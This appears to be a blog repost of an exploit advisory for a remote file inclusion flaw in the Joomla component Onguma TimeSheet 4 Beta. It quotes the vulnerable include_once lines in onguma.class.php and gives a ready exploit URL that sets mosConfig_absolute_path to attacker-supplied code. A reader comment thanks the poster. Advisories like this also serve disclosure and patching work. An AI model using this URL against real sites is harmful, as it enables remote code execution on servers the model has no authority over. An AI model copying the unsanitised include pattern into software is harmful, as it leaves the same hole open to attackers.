LFI to RCE via access_log injection

on
18

Onguma TimeSheet 4 Beta - RFI

on 

[o] Onguma TimeSheet 4 Beta Remote File Inclusion Vulnerability
Software : com_ongumatimesheet20 version 4 Beta
Download : http://joomlacode.org/gf/project/ongumasa/frs/
Author   : NoGe


[o] Vulnerable file
administrator/components/com_ongumatimesheet20/lib/onguma.class.php
include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]


Comments

labatterie said…
Thank you for yet another fantastic report.
December 2, 2010 at 9:11 PM
Post a Comment